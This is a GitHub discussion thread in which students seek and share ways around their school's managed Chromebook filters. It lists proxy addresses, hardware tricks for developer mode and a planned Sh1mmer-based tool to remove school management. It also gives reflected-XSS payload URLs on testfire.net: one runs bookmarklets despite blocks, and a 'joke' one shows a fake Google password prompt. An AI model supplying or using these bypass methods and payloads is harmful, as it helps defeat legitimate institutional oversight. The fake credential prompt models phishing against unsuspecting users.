### DISCUSSION TITLE
looking for a bypass

### DISCUSSION THREAD

**Discussion by xoidex** [3kh0/ext-remover#715] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
### wondering if anyone can find me a bypass. heres my current situation:
- "block/filter" extension: Connect for Chrome - Education
- "block/filter" extension id: "ddfbkhpmcdbciejenfcolaaiebnjcbfc"
- extensions blocked (theres a whitelist)
- data: urls not blocked
- html files not blocked
- not able to configure network stuff
- google chrome: 116.0.5845.168 (Official Build) (64-bit) 
- bookmarklets blocked
- chrome://hang, shorthang, kill, ect blocked
- acer spin 155 or "dedede" (i think)
- ctrl+shift+o nerfed
- not willing to do any sort of unenrolement

tyvm in advance :)

**Comment by 3kh0** [comment]
What is ctrl+shift+o?

**Reply by xoidex** [reply]
bookmarks

**Reply by replays36DXD** [reply]
I also have an issue, I cant get detexify to work and they blocked access to all proxies (including jamal2.bypassly.co)

**Reply by replays36DXD** [reply]
one of my friends found a way to access chrome crosh even though they blocked it (they wont tell me how to do it XD), If you know how to do this could you please tell me.

**Reply by xoidex** [reply]
replays36DXD he mightve used the extension [crosh window](https://chrome.google.com/webstore/detail/crosh-window/nhbmpbdladcchdhkemlojfjdknjadhmh) (assuming you can access extensions)

**Reply by replays36DXD** [reply]
I am notoriously known at my school for bypassing and hacking firewalls and other shit, which is ironic since I need help, however you most likely have more skill in different areas of hacking than me (lets be honest I'm more of an amature than you) so I need your help.

**Reply by replays36DXD** [reply]
oh really

**Reply by xoidex** [reply]
haha me too

**Reply by xoidex** [reply]
im just a guy who hoards proxies and knows alot about the chromebook :P. i dont know that much about coding js and whatnot xd

**Reply by xoidex** [reply]
"situation" has been updated

**Reply by xoidex** [reply]
hmm i wonder if bumping works on these discussions

**Reply by xoidex** [reply]
ah it does

**Reply by xoidex** [reply]
[bump]

**Reply by replays36DXD** [reply]
My friend found a way to somehow enter dev move on the chromebook, and I'm pretty sure how (don't take my word for it, do research on this just to be sure you dont fucking BREAK school property).It requires PHYSICALLY unscrewing the bottom of the chromebook, going into the chromebook, taking out the actual battery (while your chromebooks off...maybe idfk entirely :P) and plugging it back in and holding the power button for 30 secs (and idk if you do anything else).

**Reply by replays36DXD** [reply]
can't you also just JTAG the chromebook?

**Reply by Su4o** [reply]
Your friend is _probably_ talking about "the pencil trick" check this [writeup page for more info](https://blog.coolelectronics.me/breaking-cros-6/).

**Comment by replays36DXD** [comment]
nope

**Reply by xoidex** [reply]
you should uh make them replies instead of making new posts

**Reply by replays36DXD** [reply]
yes

**Reply by replays36DXD** [reply]
however they somehow bypassed the blocking of crosh (which was blocked do to my doing XD)

**Reply by xoidex** [reply]
just saying, you should probably delete all these unnecessary posts :p

**Reply by xoidex** [reply]
(please remove its a mess lol)

**Reply by replays36DXD** [reply]
also I'm pretty sure that you can bypass the blocking of extensions by going to

https://testfire.net/search.jsp?query=<script>window.location.href="<WEBSITE FOR BOOKMARKLET TO BE EXECUTED ON (you must have "https://" before website)>";window.location.href="<BOOKMARKLET>"</script>

**Reply by replays36DXD** [reply]
however for some reason this isn't the case for me when I do it with the exploit for LTMEAT and the gui and stuff.

**Reply by replays36DXD** [reply]
it's a reflected XSS attack on testfire.net that redirects testfire.net to whatever website you put in, like, lets say https://coolmathgames.com, then it redirects the website of your choosing to the bookmarklet url causing it to be executed in the website.

**Reply by xoidex** [reply]
you want some proxies? im currently in the middle of creating a list.

**Reply by replays36DXD** [reply]
yes please

**Reply by replays36DXD** [reply]
where do you find all these lol

**Reply by xoidex** [reply]
also replays36dxd i have no idea what a xss attack is ;-;

**Reply by xoidex** [reply]
(this is copied from a google doc)
⮟ Croxy
information: all of these croxies are linked together in some way or another. all proxies found by xoidex.
[a.cpfrx.info](http://a.cpfrx.info/)
[167.71.43.43](https://167.71.43.43/)
[b.cpfrx.info](http://b.cpfrx.info/)
[64.226.102.126](http://64.226.102.126/)
[178.128.206.205/](https://178.128.206.205/)
[c.cpfrx.info](http://c.cpfrx.info/)
[64.227.120.231](http://64.227.120.231/)
[d.cpfrx.info](http://d.cpfrx.info/)
[178.128.206.205](http://178.128.206.205/)
[178.128.206.205/](https://178.128.206.205/)
[e.cpfrx.info](http://e.cpfrx.info/)
[207.154.195.93](http://207.154.195.93/)
[207.154.195.93/](https://207.154.195.93/)
[f.cpfrx.info](http://f.cpfrx.info/)                                                                                  
[46.101.123.203](http://46.101.123.203/)
[46.101.123.203/](https://46.101.123.203/)
[g.cpfrx.info](http://g.cpfrx.info/)
[165.232.120.63](http://165.232.120.63/)
[https://www.28d0292df7be.xyz/](https://www.28d0292df7be.xyz/)
[h.cpfrx.info](http://h.cpfrx.info/)
[165.227.162.191](http://165.227.162.191/)
[i.cpfrx.info](http://i.cpfrx.info/)
[134.209.250.149](http://134.209.250.149/)

**Reply by replays36DXD** [reply]
funny thing is, I'm actually at school rn in 3rd hr heading to lunch rn

anyways thx for the proxies in advance

**Reply by xoidex** [reply]
(dont worry about the "blocked" stuff, one of my friends did that)
nvm

**Reply by replays36DXD** [reply]
funny thing is, NONE OF THEM WORK

**Reply by replays36DXD** [reply]
they ether say its blocked because its catagorized as "unknown source" or (only one of them) because its catagorized as a security proxy

**Reply by replays36DXD** [reply]
an XSS attack stands for cross-site scripting attack (don't ask why its called XSS cuz idfk) and is commonly used in phishing emails

**Reply by xoidex** [reply]
thats unfortunate. also thanks for explaining "xss"

**Reply by replays36DXD** [reply]
and there all croxyproxy right (my school blocked that since that's what i did last year when i pinged the croxyproxy ip address using crosh)

**Reply by replays36DXD** [reply]
you got any that aren't croxyproxy

**Reply by xoidex** [reply]
yeah, they're all croxies.
i also have some kproxies. here they are vvv (see if that helps)
http://149.202.98.190/ 
http://192.95.4.124/ 
http://ns511868.ip-167-114-118.net/ 
http://149.202.98.191/ 
http://192.95.12.101/ 
http://ns510622.ip-167-114-102.net/

**Reply by replays36DXD** [reply]
cuz that would actually have a chance at working

**Reply by replays36DXD** [reply]
0_0

**Reply by replays36DXD** [reply]
:0

**Reply by replays36DXD** [reply]
tysm

**Reply by xoidex** [reply]
it works? :o

**Reply by xoidex** [reply]
welcs :) glad i could help!

**Comment by replays36DXD** [comment]
now i just gotta make sure to keep my chattery mouth from fucking blabbering off

**Reply by xoidex** [reply]
make this a repLLY xd

**Reply by replays36DXD** [reply]
funny thing is that that was the only one that you sent that worked XD

**Reply by xoidex** [reply]
xD

**Reply by replays36DXD** [reply]
you wanna see the link for my custom "malware" (nr) that I call the rick astley malware XD

**Reply by replays36DXD** [reply]
here is is

https://testfire.net/search.jsp?query=%3Cscript%3Elet%20a=prompt(%22you%20must%20verify%20your%20google%20account,%20please%20enter%20your%20password%20below%22);%20alert(%22stupid,%20now%20I%20have%20full%20acces%20to%20your%20google%20account%22);window.open(%22search.jsp?query=%3Cscript%3Edocument.documentElement.innerHTML=%27more%20proof?%27%3C/script%22);%20window.open(url=%22https://www.youtube.com/watch?v=dQw4w9WgXcQ%22,%20target=%22_blank%22,%20width=%221000%22,%20height=%221000%22);%20var%20myWindow%20=%20window.open(%22%22,%20%22%22,%20%22width=1000,height=1000%22);myWindow.document.write(%22%3Ch2%20style=%27color:red%27%3EProof%20I%20hacked%20it?%3C/h2%3E%22);%20myWindow.document.write(%22%3Cbody%20style=%27background-color:%20black%27%3E%3C/body%3E%22);window.location.href=%22https://classroom.google.com%22%3C/script%3E

**Reply by replays36DXD** [reply]
it doesn't actually hack your account (it's a joke)

**Reply by replays36DXD** [reply]
(turn your sound on if you can XD)

**Reply by xoidex** [reply]
lmao

**Reply by replays36DXD** [reply]
kproxy uses bookmarklets to close (it uses javascript:hide_kproxy() function to close) but bookmarklets are blocked on my computer, and i cant access stuff that is on the top of the screen without closing it, do you have any more proxies?

**Reply by xoidex** [reply]
go here https://docs.google.com/document/d/1ydL4e9SgtG7uq7abeRMiPnsGAM8oE_gsmIJvrykst_Y/edit?usp=sharing
scroll down to partners or somthin and try to find stuff

**Reply by RavenChill-Dev** [reply]
Ik ram networks owner, I chat with them a bunch, sadly they ended a partnership with GQN (one of my documents i co-made.

**Reply by xoidex** [reply]
oh yeah you're that guy i keep on seeing

**Comment by xoidex** [comment]


**Reply by replays36DXD** [reply]
??? wdym, dym a proxy or what, I'm using the new one but I think it would still be better to use a proxy because i wont have to deal with repetitively flicking the switch and all the lag

**Reply by xoidex** [reply]
bump B)

**Comment by 3kh0** [comment]
> bookmarks



> bookmarks



> here is is
> 
> https://testfire.net/search.jsp?query=%3Cscript%3Elet%20a=prompt(%22you%20must%20verify%20your%20google%20account,%20please%20enter%20your%20password%20below%22);%20alert(%22stupid,%20now%20I%20have%20full%20acces%20to%20your%20google%20account%22);window.open(%22search.jsp?query=%3Cscript%3Edocument.documentElement.innerHTML=%27more%20proof?%27%3C/script%22);%20window.open(url=%22https://www.youtube.com/watch?v=dQw4w9WgXcQ%22,%20target=%22_blank%22,%20width=%221000%22,%20height=%221000%22);%20var%20myWindow%20=%20window.open(%22%22,%20%22%22,%20%22width=1000,height=1000%22);myWindow.document.write(%22%3Ch2%20style=%27color:red%27%3EProof%20I%20hacked%20it?%3C/h2%3E%22);%20myWindow.document.write(%22%3Cbody%20style=%27background-color:%20black%27%3E%3C/body%3E%22);window.location.href=%22https://classroom.google.com%22%3C/script%3E


Nice rickroll

**Reply by AshtonDavies** [reply]
> Who ever made that bookmarklet just saying your a dumbass and thought you could get my account information lmfao maybe try making your own account instead of hacking other people like an idiot

That was a joke, it doesn't take any account info.

**Comment by ghost** [comment]
you're not exactly good at this
________________________________

**Reply by xoidex** [reply]
when did i say i was smh

**Comment by doofenator** [comment]
bro js do new LTMEAT

**Reply by xoidex** [reply]
tried that; this would be answered if it worked for me.

**Comment by xoidex** [comment, marked as answer]
i dont even care about this anymore :p

**Reply by xoidex** [reply]
also everything was blocked on dns level

**Comment by RavenChill-Dev** [comment]
### Ok, I can answer yall question for real.
I have been developing a _fake_  jailbreak hack for school chromebooks, and it actually works, well will work if I finish it. 
I've been working on this cool USB-Reload hack for school, and what it does gets confusing:

1. First, it automatically blows past any management firewall to get into developer mode by using Sh1mmer, then begins using some of the files on the usb, it will run a cool program I made to type up commands in a bash terminal and developer mode(also thanks Sh1mmer)
2. Then after typing up said commands to speed up the process, I will then boot the chromebook back into the recovery screen to back to Sh1mmer.
3. After Sh1mmer loads, I will then boot from my Chrome OS latest USB, that is edited to a point with a AI firewall, it will basically be impossible for the school to remove it. The Chrome OS will include an VPN, no management, and completely will be reversible by using a simple button on the new OS. (There will be software transferred to the normal OS to switch back and forth easy) 

I hope to finish. This by the end of the year, but first I have to go get some more USBS since most of them keep blowing themselves up due to some of the programs Ive been running LOL. All I need is time and some money XD. So @xoidex I hope you will be happy after its done :D

**Reply by xoidex** [reply]
yoooo that's pretty cool! and yes i will be happy xd
